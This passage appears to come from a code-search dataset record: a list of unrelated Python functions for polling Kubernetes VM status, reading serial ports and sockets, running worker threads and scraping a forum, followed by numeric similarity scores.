cat['name']\n app['cat_logo'] = cat['logo']\n # Get app status\n if app['cat_type'] == 'vm':\n # first, look at DataVolume status of app.\n CMD = \"kubectl --kubeconfig \" + PROJECT_ROOT + '/' \\\n + d['endpoint'] + ' get dv ' \\\n + app['name'] \\\n + \" -o jsonpath='{range .status}{.phase},{.progress}{end}'\"\n (b_res, s_out) = cmd(CMD, 5, False)\n l_out = s_out.split(',')\n if l_out[0] == 'Succeeded':\n # Get vm status of app\n CMD = \"kubectl --kubeconfig \" + PROJECT_ROOT \\\n + '/' \\\n + d['endpoint'] + ' get vm ' \\\n + app['name'] \\\n + \" -o jsonpath='{.status.ready}'\"\n (b_res, s_out) = cmd(CMD, 5, False)\n if b_res and s_out == 'true':\n # update app status 'running'.\n app.update({'status': 'running'})\n \n if app['edge'] == d['name']:\n # Get where app is running.\n CMD = \"kubectl --kubeconfig \" \\\n + PROJECT_ROOT + '/' \\\n + d['endpoint'] + ' get vmi ' \\\n + app['name'] \\\n + \" -o jsonpath='{.status.nodeName}'\"\n (b_res, s_out) = cmd(CMD, 5, False)\n if b_res:\n d_app['hostname'] = d_nodes[s_out]\n # Get nodeport for app.\n CMD = \"kubectl --kubeconfig \" \\\n + PROJECT_ROOT + '/' \\\n + d['endpoint'] + ' get svc ' \\\n + app['name'] \\\n + \" -o jsonpath='{.spec.ports[0].nodePort}'\"\n (b_res, s_out) = cmd(CMD, 5, False)\n if b_res:\n d_app['port'] = s_out\n else:\n # update app status 'stopped'\n app.update({'status': 'stopped'})\n elif l_out[0] == 'ImportInProgress':\n # update app status 'building' and \n app.update({'status': 'building ({})'.format(l_out[1])})\n elif app['cat_type'] == 'container':\n app.update({'status': 'running'})\n \n try:\n s = '{}/app/{}'.format(etcdc.prefix,\n app['name'])\n # log.debug(app)\n etcdc.write(s, app, prevExist=True)\n except etcd.EtcdKeyNotFound as e:\n log.error(e)\n \n if 'port' in d_app:\n l_app.append(d_app)\n # render guac-config.j2 and copy it to guac broker server\n log.debug(l_app)\n template = env.get_template('broker.j2')\n s_out = template.render(l_app=l_app)\n s_tmp = '/tmp/{}.broker'.format(d['name'])\n try:\n with open(s_tmp, 'w') as f:\n f.write(s_out)\n except Exception as e:\n 
log.error(e)\n else:\n CMD = \"scp \" \\\n + \"-P42544 {} {}\".format(s_tmp, d['broker_ip']) \\\n + \":/etc/guacamole/noauth-config.xml\"\n log.debug(CMD)\n (b_res, s_out) = cmd(CMD, 5, False)\n if b_res:\n d_app['port'] = s_out\n \n l_edge.append(d)\n \n # log.debug(l_edge)\n log.debug(l_app)\n \n time.sleep(1)\n except:\n log.error('unknown error')", "def do_GET(self):\n for i in range(0,5):\n \"\"\" gather status update time\"\"\"\n f = open(STATUSTIME, \"rb\")\n try:\n mm = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)\n last = int(mm.readline())\n mm.seek(0)\n mm.close()\n except ValueError as e:\n print(e.message + str(i) + ' failed to read status time')\n continue\n f.close()\n \"\"\" gather json status \"\"\"\n st = open(STATUSFILE, \"rb\")\n try:\n buf = mmap.mmap(st.fileno(), 0, access=mmap.ACCESS_READ)\n raw = (buf.read(len(buf)))\n #print('reading status ' + hashlib.sha1(raw).hexdigest())\n except ValueError as e:\n print(e.message + str(i) + ' failed to read json status')\n continue\n data = None\n if raw is not None:\n try:\n data = raw\n #data = json.loads(raw)\n except ValueError as e:\n print(e.message + str(i) + ' failed to load json status')\n continue\n \"\"\" all done - exit for loop\"\"\"\n break\n else:\n print('all attempts failed')\n self.send_response(500)\n self.end_headers()\n self.wfile.write('\\n')\n return\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n# message = threading.currentThread().getName() + ' ' + str(last) + ' ' +str(data)\n# message = str(raw)\n message = str(data)\n \n self.wfile.write(message)\n self.wfile.write('\\n')\n return", "def collect_data(self):\n self.logger.info(\"Waiting for incoming data ...\")\n while True:\n item = self.in_queue.get()\n self.logger.info(\"Received data!\")\n self.collector_process_data(item)", "def read_sm(self):\r\n while True:\r\n # wait to receive a read request\r\n addr = yield self.r_in_pipe.get()\r\n # model read latency\r\n #for i in range(self.read_latency):\r\n yield self.wait_sys_clks(self.read_latency)\r\n # try to read data from memory\r\n if addr in self.mem.keys():\r\n data = self.mem[addr]\r\n else:\r\n print >> sys.stderr, \"ERROR: BRAM read_sm: specified address {} is out of range\".format(addr)\r\n data = None\r\n self.rd_count += 1\r\n # write data back\r\n self.r_out_pipe.put(data)", "def run(self):\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(self.address)\n\n #send dummy data\n sock.sendall(bytes(\"Give me\", \"utf-8\"))\n received = sock.recv(1024)\n while True:\n data = sock.recv(1024)\n if not data: break\n received += data\n lymphocytes = pickle.loads(received)\n self.lymphocytes_setter(lymphocytes)\n except ConnectionRefusedError:\n #Don't bother. 
May be it's better to add more logic to determine\n #permanent connection errors.\n pass\n finally:\n sock.close()", "def get_data():\n global collecting\n global has_ran\n global tables\n\n output = \"Setting collecting variable to true, should be false: \" + str(collecting) + \"\\n\"\n os.write(log_file, output)\n print(output) \n # Set collecting variable to lock access to logger\n collecting = True\n\n output = \"Just set collecting variable to true, should be true now: \" + str(collecting) + \"\\n\"\n os.write(log_file, output)\n print(output) \n\n # 15 minutes = 900 seconds\n FIFTN_MINUTES_N_SECS = 900\n \n output = \"In get_data, about to set threading timer\\n\"\n os.write(log_file, output)\n print(output) \n\n # Set timer to run method again in 15 minutes\n threading.Timer(FIFTN_MINUTES_N_SECS, get_data).start()\n \n output = \"In get_data, about to pull data from logger\\n\"\n os.write(log_file, output)\n print(output) \n\n # Pull data for each table on logger \n for table in tables:\n output = \"Inside table iteration, table is: \" + str(table) + \"\\n\"\n os.write(log_file, output)\n print(output) \n # Get data\n collect_data(table)\n \n output = \"Inside table iteration, Finished pulling data from table \\n\"\n os.write(log_file, output)\n print(output) \n\n # Ensure headers are disabled\n if not has_ran:\n has_ran = True;\n\n output = \"In get_data, finished pulling data from logger\\n\"\n os.write(log_file, output)\n print(output) \n\n output = \"Setting collecting variable to false, should be true: \" + str(collecting) + \"\\n\"\n os.write(log_file, output)\n print(output) \n\n # Finished collecting, unblock and let data upload to plot.ly\n collecting = False\n\n output = \"Just set collecting variable to false, should be false now: \" + str(collecting) + \"\\n\"\n os.write(log_file, output)\n print(output) \n\n return 0", "def worker_serial_read(self):\r\n while self.active_flag.is_set():\r\n if not self.data_recieved_flag.is_set() and self.serial_data.in_waiting > 0:\r\n # strtmp=self.serial_data.read_until(b'\\x02\\x01\\x04\\x03\\x06\\x05\\x08\\x07');\r\n strtmp = self.serial_data.read_all()\r\n if (strtmp != b''):\r\n # self.buffer_busy_flag.wait();\r\n self.buffer_busy_flag.clear()\r\n # self.recieved_data=[self.recieved_data,strtmp];\r\n self.recieved_data = strtmp\r\n self.buffer_busy_flag.set()\r\n self.data_recieved_flag.set()\r\n else:\r\n time.sleep(0.001)\r\n\r\n return", "def job():\n send_list = [\n {\n \"city\": \"台北\",\n \"user\": USER2,\n },\n {\n \"city\": \"新北\",\n \"user\": USER1,\n },\n ]\n with ApiClient(configuration) as api_client:\n line_bot_api = MessagingApi(api_client)\n for data in send_list:\n get_today_weather(\n FROM_TASK, line_bot_api, text=data[\"city\"], user_id=data[\"user\"]\n )", "def threadWorker(self):\n while True:\n row = self.queue.get() #get a row of data\n if row is None: #ending criterium\n break\n self.similarityQuestions(row) #the actual working function\n self.queue.task_done() #inform the queue one task is done", "def run(self):\n\t\tself.data_source.connect()\n\t\twhile self.running:\n\t\t\tself.data_source.read()", "def run(self):\n try:\n # connect method implementation should return a TaskInfo object\n info = self.connect()\n except:\n # if an error has occurred create a TaskHeadError object\n info = TaskHeadError(self.url.host, 0)\n finally:\n self.data_queue.put(info) # put the result in the queue\n self.ready.set() # and mark the thread as completed", "async def get_data(self, endpoint):\n try:\n with 
async_timeout.timeout(5, loop=self._loop):\n response = await self._session.get(f\"{endpoint}\")\n\n _LOGGER.debug(\"Response from Dingz device: %s\", response.status)\n self.data = await response.json()\n _LOGGER.debug(self.data)\n except (asyncio.TimeoutError, aiohttp.ClientError):\n _LOGGER.error(\"Can not load data from Dingz device\")\n self.data = None\n raise exceptions.DingzConnectionError()", "async def _read(self):\n try:\n logger.debug('Enter Task._read for %s', self.url)\n while self.websocket:\n await self._read_once()\n except Exception:\n logger.exception('Unhandled exception in Task._read for %s', self.url)\n finally:\n logger.debug('Exit Task._read for %s', self.url)", "def run(self):\n self.read_from_serial()", "def _fetch_data(self, samples):\n pass", "def get_data_sync(self, out_format: str='json', chk_interval=0.25, max_chks=65535):\n if self.data:\n return self.data\n check_cnt = 0\n while True:\n if check_cnt >= max_chks:\n break\n self.data_ready = self.check_available()\n if self.data_ready:\n break\n else:\n check_cnt += 1\n sleep(chk_interval)\n if not self.data_ready:\n raise DataNotReady(\"The run {} has not yet finished, data not available yet.\".format(self))\n resp = self.ph.conn.request(\n 'GET', self.ph.URLS['getdata'].format(self.run_token), dict(api_key=self.ph.api_key, format=out_format))\n data = resp.data.decode('utf-8')\n self.data = self.parse_json_data(data)\n return self.data", "def await_data(self):\n self.data.append(self.socket.recv(1))", "async def _main(self):\n while True:\n time.sleep(1)", "def do_work(self):", "async def async_update(self):\n try:\n self._data = requests.get(self._build_url(), timeout=10, headers={'accept-encoding': None}).json()\n _LOGGER.debug(\"TOON fetched data = %s\", self._data)\n except (requests.exceptions.RequestException) as error:\n _LOGGER.error(\"Unable to connect to TOON: %s\", error)\n self._data = None", "def run(self):\n while True:\n msg = self.recv()", "def fetch(self):\n \n self.genre=\"Review\"\n \n try:\n self.parent_uri = self.currenturi\n \n self.total_threads_count = 0\n self.last_timestamp = datetime( 1980,1,1 )\n if tg.config.get(path='Connector',key='collegenet_max_threads_to_process'):\n self.max_threads_count = int(tg.config.get(path='Connector',key='collegenet_max_threads_to_process'))\n else:\n self.max_threads_count = None\n \n self.collegenetTimelag_max = tg.config.get(path='Connector', key='collegenet_search_timeLag_max')\n self.collegenetTimelag_min = tg.config.get(path='Connector', key='collegenet_search_timeLag_min')\n log.info(self.log_msg('Time Logs :::::::'))\n log.info(self.collegenetTimelag_max)\n log.info(self.collegenetTimelag_min)\n \n## if self.collegenetTimelag_min and self.collegenetTimelag_max:\n## randomTimeLag = random.randint(self.collegenetTimelag_min,self.collegenetTimelag_max) / 1000.0000\n## log.info('sleeping for %s seconds between requests'%randomTimeLag)\n## time.sleep(randomTimeLag)\n \n if not self.__setSoup():\n log.exception(self.log_msg('Soup not set ..... 
'))\n return False\n \n #post_no = 0 #Remove\n while True:\n #if post_no==3: #Remove\n # break #Remove\n #post_no = post_no + 1 #Remove\n \n currenturi = self.currenturi\n if not self.__addPosts():\n break \n #Get \"post\" information\n #break #Remove\n self.currenturi = currenturi\n if self.collegenetTimelag_min and self.collegenetTimelag_max:\n randomTimeLag = random.randint(self.collegenetTimelag_min,self.collegenetTimelag_max) / 1000.0000\n log.info('sleeping for %s seconds between requests'%randomTimeLag)\n time.sleep(randomTimeLag)\n #We need to set soup again as addPosts() method is changing self.currenturi and self.soup\n if not self.__setSoup():\n log.info(self.log_msg('Soup not set.... break while loop.'))\n break\n \n try:\n next_uri = baseuri + self.soup.find('div',id='search_results_controls').find('a',text=re.compile('&gt;')) \\\n .parent['href']\n self.currenturi = next_uri\n log.info(self.log_msg('Next URI :::::::;'))\n log.info(next_uri)\n except:\n log.exception(self.log_msg('Next Post link not found'))\n break\n \n## if self.collegenetTimelag_min and self.collegenetTimelag_max:\n## randomTimeLag = random.randint(self.collegenetTimelag_min,self.collegenetTimelag_max) / 1000.0000\n## log.info('sleeping for %s seconds between requests'%randomTimeLag)\n## time.sleep(randomTimeLag)\n \n if not self.__setSoup():\n log.info(self.log_msg('Soup not set.... break while loop.'))\n break\n \n return True\n \n except:\n log.exception(self.log_msg('Exception in fetch'))\n return False", "def run(self):\n while True:\n try:\n if not self._read_new_entries(False):\n time.sleep(0.1)\n self._update_all_tasks()\n except KeyboardInterrupt:\n break", "def thread_function():\n while True:\n try:\n s.sanitization()\n try:\n t.yeast_temp()\n try:\n w.read_weight_grains()\n try:\n w.read_weight_hops()\n try:\n QualityCheck_Prep.QualityCheck.get_QA_Check(request_number)\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n except Exception as e:\n print(e)\n break", "def run(self):\n data = b'' # data buffer\n try:\n sock = self.conn.transfercmd('RETR ' + self.url.filename, self.offset)\n # loop while received data size is less than block size\n # however the last block could be lesser than that size\n while len(data) < self.block_size:\n if self.cancelled.is_set(): # if the thread has been cancelled\n # stop the thread, the TaskError would not be processed\n # because a loop in the main thread already broken\n raise Exception\n # get data, but not more than fragment size\n # and the size remaining to full block\n data_fragment = sock.recv(min(self.block_size - len(data), self.FRAGMENT_SIZE))\n if not data_fragment: # if there is no data - error\n raise MirrorError\n data += data_fragment # add data to the buffer\n info = TaskProgress(self.url.host, 206, len(data))\n self.data_queue.put(info)\n # if reached the end of the file - exit loop\n if self.file_size - self.offset - len(data) <= 0:\n break\n # when the downloading loop finished, create TaskData object\n info = TaskData(self.url.host, 206, self.offset, data)\n sock.close()\n except:\n # if an error has occurred - create a TaskError object\n info = TaskError(self.url.host, 0, self.offset)\n finally:\n self.conn.close()\n self.data_queue.put(info) # put result TaskInfo object into the queue\n self.ready.set() # mark the thread as comleted", "def receiver(): \n global data\n DW1000.newReceive()\n DW1000.receivePermanently()\n DW1000.startReceive()", 
"def test_get(self):\n # Start sampling\n self.driver.start_sampling()\n\n self.clear_async_data()\n self.create_sample_data_set_dir(\n \"node59p1_step1.dat\",\n TELEM_DIR,\n \"node59p1.dat\",\n copy_metadata=False\n )\n self.assert_data((DostadParserTelemeteredDataParticle, DostadParserTelemeteredMetadataDataParticle),\n 'test_data_1.txt.result.yml', count=2, timeout=10)\n\n # there is only one file we read from, this example 'appends' data to\n # the end of the node59p1.dat file, and the data from the new append\n # is returned (not including the original data from _step1)\n self.clear_async_data()\n self.create_sample_data_set_dir(\n \"node59p1_step2.dat\",\n TELEM_DIR,\n \"node59p1.dat\",\n copy_metadata=False\n )\n self.assert_data(DostadParserTelemeteredDataParticle, 'test_data_2.txt.result.yml',\n count=1)\n\n # now 'appends' the rest of the data and just check if we get the right number\n self.clear_async_data()\n self.create_sample_data_set_dir(\n \"node59p1_step4.dat\",\n TELEM_DIR,\n \"node59p1.dat\",\n copy_metadata=False\n )\n self.assert_data(DostadParserTelemeteredDataParticle, count=4)", "async def run(self) -> None:", "async def run(self) -> None:", "def threadget(self, url, *args):\n\n self.logger.debug(\"Starting a thread to simulate a GET request to %s\" % url)\n api_get = threading.Thread(target=self.get, args=(url, *args,))\n api_get.start()", "def read_thread(thread_num):\n pass# TODO", "def testInThread(self):\n\n self.collectSensorData()\n self.moveHome()\n self.requestGrasp()\n result = self.waitForGenerateGraspsResult()\n graspFound = self.processGenerateGraspsResult(result)\n return graspFound", "def run(self):\n\n if self.transport == 'any':\n devs = kromek.discover()\n else:\n devs = kromek.discover(self.transport)\n\n print('Discovered %s' % devs)\n\n if len(devs) <= 0:\n return\n\n filtered = []\n\n for dev in devs:\n if self.device == 'all' or dev[0] in self.device:\n filtered.append(dev)\n\n devs = filtered\n if len(devs) <= 0:\n return\n\n done_devices = set()\n try:\n while self.running:\n print(\"Plot_manager.run: getting data\")\n with kromek.Controller(devs, self.interval) as controller:\n for reading in controller.read():\n if self.create_structures:\n self.total = np.array(reading[4])\n self.lst = np.array([reading[4]])\n self.create_structures = False\n else:\n self.total += np.array(reading[4])\n self.lst = np.concatenate(\n (self.lst, [np.array(reading[4])]))\n serial = reading[0]\n dev_count = reading[1]\n if serial not in done_devices:\n this_start, this_end = self.get_interval(\n time.time() - self.interval)\n\n self.handle_spectra(\n this_start, this_end, reading[4])\n if dev_count >= self.count > 0:\n done_devices.add(serial)\n controller.stop_collector(serial)\n if len(done_devices) >= len(devs):\n break\n except KeyboardInterrupt:\n self.vprint(1, '\\nKeyboardInterrupt: stopping Manager run')\n self.takedown()\n except SystemExit:\n self.vprint(1, '\\nSystemExit: taking down Manager')\n self.takedown()", "def _readloop(self):\r\n\r\n while self._ll_alive:\r\n with self._rx_lock:\r\n data = self._Random(1)\r\n if len(data) != 0: # check for timeout\r\n self._uart_rx_queue.put(data)", "async def run():\n while(1):\n # timeout < 1 seems not very stable on my system\n d = await scanner.find_device_by_address(\"C0:98:E5:49:53:54\", timeout=2)\n if not d:\n # Device not found,\n continue\n if ('manufacturer_data' not in d.metadata) or \\\n (d.metadata['manufacturer_data'] is None) or \\\n (736 not in d.metadata['manufacturer_data']):\n 
print(\"Corrupted data %s ...\" % d.metadata)\n continue\n # This is the mfg data (without the leading 2-byte mfg id)\n # No idea what is 736\n return d.metadata['manufacturer_data'][736]", "def output_thread():\n global gRunning\n\n try:\n while gRunning:\n try:\n inference_result, user_data = gGraph.GetResult()\n \n print (postprocess(inference_result))\n #print(user_data)\n # gUpdateq.put((postprocess(inference_result), user_data))\n\n \n except KeyError:\n # This error occurs when GetResult can't access the user param from the graph, we're just ignoring it for now\n print(\"KeyError\")\n pass\n except Exception as e:\n print(e)\n pass\n print(\"Output thread terminating\")", "def init_data(request):\n if request.method == 'POST':\n data = request.data\n key_word=data[\"key_word\"]\n n_threads = 1\n for thread in range(1, n_threads + 1):\n task_scrapy_jobs.delay(key_word, thread, n_threads)\n return Response(data={\"key_word\":key_word},status=status.HTTP_200_OK)" ]
[ "0.696191", "0.6716008", "0.65941787", "0.6481667", "0.6426779", "0.6374192", "0.62645483", "0.61824685", "0.610256", "0.60537034", "0.60457593", "0.60247904", "0.5971915", "0.59577423", "0.5926537", "0.59190476", "0.58765227", "0.5859717", "0.5845389", "0.58351386", "0.5819517", "0.581063", "0.580608", "0.5793419", "0.5767907", "0.576631", "0.576184", "0.5757008", "0.5757008", "0.5757008", "0.57562435", "0.5745119", "0.5744662", "0.572531", "0.5721983", "0.5710158", "0.56994456", "0.56859547", "0.56839055", "0.5675979", "0.56734204", "0.56665224", "0.56643593", "0.56624216", "0.5645447", "0.5639175", "0.5636106", "0.56267935", "0.56221986", "0.56212574", "0.56160825", "0.5609989", "0.5609094", "0.5603139", "0.5602717", "0.5600033", "0.55900675", "0.55898756", "0.5586539", "0.55832887", "0.55800134", "0.5576575", "0.5570857", "0.55690426", "0.5566242", "0.5561607", "0.5554038", "0.5549329", "0.55335283", "0.55331993", "0.5529088", "0.5527612", "0.5527447", "0.5506676", "0.5503375", "0.55031544", "0.5501448", "0.55010414", "0.5496789", "0.54950786", "0.5487357", "0.5486648", "0.5484855", "0.5484249", "0.5484076", "0.54815906", "0.54733175", "0.54713976", "0.5468115", "0.54653174", "0.5464705", "0.5462504", "0.5462504", "0.54612297", "0.5456765", "0.5456166", "0.5450522", "0.5438045", "0.54356974", "0.54302627", "0.5426204" ]
0.0
-1
Change the position of the pan
def set_position(self, node_uuid, index, data): try: servox = self._bus.nodeman.find_node('servox') servoy = self._bus.nodeman.find_node('servoy') logger.debug('[%s] - set_position of servos %s and %s', self.__class__.__name__, servox, servoy) if data is None or data=="-1|-1": sx,sy = self.values['initial'].get_data_index(index=index).split('|') else: sx,sy = data.split('|') logger.debug('[%s] - set_position to data %s|%s', self.__class__.__name__, sx, sy) datax = "%s|%s|%s"%(sx, self.values['angle_minx'].get_data_index(index=index), self.values['angle_maxx'].get_data_index(index=index)) datay = "%s|%s|%s"%(sy, self.values['angle_miny'].get_data_index(index=index), self.values['angle_maxy'].get_data_index(index=index) ) servox.values['angle'].data = datax servoy.values['angle'].data = datay self.values['position']._data = data except Exception: logger.exception('[%s] - Exception when set_position', self.__class__.__name__)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def panTo(self, p=None):\n if p == None:\n p = self.focus\n MV = self.MV\n vr = self.getViewRight()\n vu = self.getViewUp()\n p = -p\n x = np.dot(p, vr) # dot product\n y = np.dot(p, vu)\n MV[3, :2] = x, y # set first two entries of 4th row to x, y\n self.MV = MV", "def panTo(self, p=None):\n if p == None:\n p = self.focus\n MV = self.MV\n vr = self.getViewRight()\n vu = self.getViewUp()\n p = -p\n x = np.dot(p, vr) # dot product\n y = np.dot(p, vu)\n MV[3, :2] = x, y # set first two entries of 4th row to x, y\n self.MV = MV", "def pan(self, parameter):\n self.tx += parameter[0] / self.sx\n self.ty += parameter[1] / self.sy", "def test_pan():\n _c = _a.copy()\n _c = _c.piv.pan(1.0, -1.0) # note the use of .piv.\n assert np.allclose(_c.coords[\"x\"][0], 1.312480)\n assert np.allclose(_c.coords[\"y\"][0], -1.31248)", "def do_pan_view(self, dx, dy):\n auto = self.autoReplot()\n self.setAutoReplot(False)\n axes_to_update = self.get_axes_to_update(dx, dy)\n axis_ids_horizontal = (self.get_axis_id(\"bottom\"), self.get_axis_id(\"top\"))\n axis_ids_vertical = (self.get_axis_id(\"left\"), self.get_axis_id(\"right\"))\n\n for (x1, x0, _start, _width), axis_id in axes_to_update:\n lbound, hbound = self.get_axis_limits(axis_id)\n i_lbound = self.transform(axis_id, lbound)\n i_hbound = self.transform(axis_id, hbound)\n delta = x1 - x0\n vmin = self.invTransform(axis_id, i_lbound - delta)\n vmax = self.invTransform(axis_id, i_hbound - delta)\n # patch for not \"panning out\"\n if axis_id in axis_ids_horizontal:\n vmin = max(vmin, self.peakmap_range[0])\n vmax = min(vmax, self.peakmap_range[1])\n elif axis_id in axis_ids_vertical:\n vmin = max(vmin, self.peakmap_range[2])\n vmax = min(vmax, self.peakmap_range[3])\n self.set_axis_limits(axis_id, vmin, vmax)\n\n self.setAutoReplot(auto)\n # the signal MUST be emitted after replot, otherwise\n # we receiver won't see the new bounds (don't know why?)\n self.replot()\n self.emit(SIG_PLOT_AXIS_CHANGED, self)", "def OnMove(self, event): # ANDY PAN\n if event.ShiftDown():\n event.Skip()\n return\n\n # for windows, set focus onto pyslip window\n # linux seems to do this automatically\n if sys.platform == \"win32\" and self.FindFocus() != self:\n self.SetFocus()\n\n # get current mouse position\n (x, y) = event.GetPosition()\n # from common.architecture_support import whoscalling2\n # dbg(whoscalling2())\n\n # self.RaiseMousePositionEvent((x, y))\n\n if event.Dragging() and event.LeftIsDown():\n # are we doing box select?\n if not self.last_drag_x is None:\n # no, just a map drag\n self.was_dragging = True\n dx = self.last_drag_x - x\n dy = self.last_drag_y - y\n\n # dx /= 20\n # dy /= 20\n # dbg(dx)\n # dbg(dy)\n\n # print \"PAN %d %d\" % (dx, dy)\n # print self.GetViewStart()\n currx, curry = self.GetViewStart()\n self.Scroll(\n currx + dx, curry + dy\n ) # Note The positions are in scroll units, not pixels, so to convert to pixels you will have to multiply by the number of pixels per scroll increment. 
If either parameter is -1, that position will be ignored (no change in that direction).\n # print \"Scroll pan %d %d\" % (currx+dx, curry+dy)\n\n # adjust remembered X,Y\n self.last_drag_x = x\n self.last_drag_y = y\n\n # redraw client area\n self.Update()", "def pan(self,dx=0.0,dy=0.0):\n self._obj['x'] += dx\n self._obj['y'] += dy\n return self._obj", "def pan(self, dx, dy):\n d = self.getDistance()\n vr = self.getViewRight()\n vr *= dx*d\n GL.glTranslate(vr[0], vr[1], vr[2])\n vu = self.getViewUp()\n vu *= dy*d\n GL.glTranslate(vu[0], vu[1], vu[2])", "def mouseMoveEvent(self, ev):\n shift = ev.modifiers() & QtCore.Qt.ShiftModifier\n ctrl = ev.modifiers() & QtCore.Qt.ControlModifier\n if shift:\n y = ev.pos().y()\n if not hasattr(self, '_prev_zoom_pos') or not self._prev_zoom_pos:\n self._prev_zoom_pos = y\n return\n dy = y - self._prev_zoom_pos\n def delta():\n return -dy * 5\n ev.delta = delta\n self._prev_zoom_pos = y\n self.wheelEvent(ev)\n elif ctrl:\n pos = ev.pos().x(), ev.pos().y()\n if not hasattr(self, '_prev_pan_pos') or not self._prev_pan_pos:\n self._prev_pan_pos = pos\n return\n dx = pos[0] - self._prev_pan_pos[0]\n dy = pos[1] - self._prev_pan_pos[1]\n self.pan(dx, dy, 0, relative=True)\n self._prev_pan_pos = pos\n else:\n super(PlotObject, self).mouseMoveEvent(ev)", "def set_position(self, position):\n self.gripper_io.set_signal_value(\"position_m\", position)", "def setPosition(position):", "def pan(self, dx, dy):\n d = self.getDistance()\n vr = self.getViewRight()\n vr *= dx*d\n GL.glTranslatef(vr[0], vr[1], vr[2])\n vu = self.getViewUp()\n vu *= dy*d\n GL.glTranslatef(vu[0], vu[1], vu[2])", "def set_position( self ):\n\t\tscreen_rect = self.get_preview_window_screen_rect( )\n\n\t\twhile screen_rect.Intersects( self.GetScreenRect( ) ):\n\t\t\tpos = self.GetPosition( )\n\t\t\tself.SetPosition( ( pos[ 0 ] - 2, pos[ 1 ] + 2 ) )", "def pan(self):\n return self._pan", "def setPosition(self):\n self.data['pos-x'] = \"%s\" % self.x()\n self.data['pos-y'] = \"%s\" % self.y()", "def xview_moveto(self, fraction):\n self.tk.call(self._w, 'xview', 'moveto', fraction)", "def update_simulate_plot(self):\n a = self.plot_zoom.getViewBox().viewRange()\n self.plot_simulate.setXRange(a[0][0], a[0][1])\n self.plot_simulate.setYRange(a[1][0], a[1][1])", "def reposition(self, x, y):\n self.groupx = x\n self.groupy = y\n self.call('reposition', x, y)", "def updatePos(self):\n self.setPos(self.centerX-self.boundingRect().width()/2.0,\n self.centerY-self.boundingRect().height()/2.0)", "def set_drone_position(self, new_point):\n self.drone.set_drone_position(new_point)", "def set_panning_mouse(self):\n # Panning: left button mouse\n self.set('LeftClickMove', 'Pan',\n param_getter=lambda p: (p[\"mouse_position_diff\"][0],\n p[\"mouse_position_diff\"][1]))", "def test_pan():\n _a = io.load_vec(os.path.join(path, f1))\n _c = _a.piv.pan(1.0, -1.0) # note the use of .piv.\n assert np.allclose(_c.coords[\"x\"][0], 1.312480)\n assert np.allclose(_c.coords[\"y\"][0], -1.31248)", "def set_panning_keyboard(self):\n # Panning: keyboard arrows\n self.set('KeyPress', 'Pan',\n key='Left',\n param_getter=lambda p: (.24, 0))\n self.set('KeyPress', 'Pan',\n key='Right',\n param_getter=lambda p: (-.24, 0))\n self.set('KeyPress', 'Pan',\n key='Up',\n param_getter=lambda p: (0, -.24))\n self.set('KeyPress', 'Pan',\n key='Down',\n param_getter=lambda p: (0, .24))", "def Position(self, pos):\r\n\r\n self.dock_pos = pos\r\n return self", "def set_view(self):\n self.scene.mlab.view(azimuth=90.0, elevation=-90.0)", "def 
yview_moveto(self, fraction):\n self.tk.call(self._w, 'yview', 'moveto', fraction)", "def move(self, p):\r\n self.position.setvalue(p)", "def move(self):\n \n self.position = self.wander()", "def setPos(self, pos):\n self.cameraNode.setPos(pos)", "def mouseReleaseEvent(self, ev):\n super(PlotObject, self).mouseReleaseEvent(ev)\n if self._downpos == ev.pos():\n x = ev.pos().x()\n y = ev.pos().y()\n if ev.button() == 2 :\n self.mPosition()\n elif ev.button() == 1:\n x = x - self.width() / 2\n y = y - self.height() / 2\n #self.pan(-x, -y, 0, relative=True)\n print(self.opts['center'])\n print(x,y)\n self._prev_zoom_pos = None\n self._prev_pan_pos = None", "def setPosition(self, position, view) -> None:\n ...", "def set_axial_view(self):\n self.renderer.ResetCamera()\n fp = self.renderer.GetActiveCamera().GetFocalPoint()\n p = self.renderer.GetActiveCamera().GetPosition()\n dist = math.sqrt((p[0] - fp[0]) ** 2 + (p[1] - fp[1]) ** 2 + (p[2] - fp[2]) ** 2)\n self.renderer.GetActiveCamera().SetPosition(fp[0], fp[1], fp[2] + dist)\n self.renderer.GetActiveCamera().SetViewUp(0.0, 1.0, 0.0)\n self.renderer.GetActiveCamera().Zoom(1.8)\n self.render_window.Render()", "def positionZoomed(self):\n rect_size = self._image.get_rect()\n\n if rect_size.width > 720:\n self.x = (int((720 - rect_size.width ) / 2))\n\n if rect_size.height > 720:\n self.y = (int((720 - rect_size.height) / 2))", "def setPose(self, newPosition):\n self.origin1 = newPosition\n self.axis1 = self.G_gl[0:3, 0:3] @ self.axis0", "def SetPane(self, p):\r\n \r\n self.pane = p", "def new_position(self, p):\n if self.track:\n self.gnx = p.gnx\n else:\n p = self.get_position()\n\n self.new_position_edit(p)\n self.new_position_view(p)", "def pan(self, renderer, camera, x, y, last_x, last_y, center_x, center_y):\n\n f_point = camera.GetFocalPoint()\n f_point_0 = f_point[0]\n f_point_1 = f_point[1]\n f_point_2 = f_point[2]\n\n p_point = camera.GetPosition()\n p_point_0 = p_point[0]\n p_point_1 = p_point[1]\n p_point_2 = p_point[2]\n\n renderer.SetWorldPoint(f_point_0, f_point_1, f_point_2, 1.0)\n renderer.WorldToDisplay()\n d_point = renderer.GetDisplayPoint()\n focal_depth = d_point[2]\n\n a_point_0 = center_x + (x - last_x)\n a_point_1 = center_y + (y - last_y)\n\n renderer.SetDisplayPoint(a_point_0, a_point_1, focal_depth)\n renderer.DisplayToWorld()\n r_point = renderer.GetWorldPoint()\n r_point_0 = r_point[0]\n r_point_1 = r_point[1]\n r_point_2 = r_point[2]\n r_point_3 = r_point[3]\n\n if r_point_3 != 0.0:\n r_point_0 = r_point_0 / r_point_3\n r_point_1 = r_point_1 / r_point_3\n r_point_2 = r_point_2 / r_point_3\n\n camera.SetFocalPoint((f_point_0 - r_point_0) / 2.0 + f_point_0,\n (f_point_1 - r_point_1) / 2.0 + f_point_1,\n (f_point_2 - r_point_2) / 2.0 + f_point_2)\n camera.SetPosition((f_point_0 - r_point_0) / 2.0 + p_point_0,\n (f_point_1 - r_point_1) / 2.0 + p_point_1,\n (f_point_2 - r_point_2) / 2.0 + p_point_2)\n self.ren_win.Render()", "def setDesiredPosition(self, x, y):\n (self.setX, self.setY) = (x , y)", "def 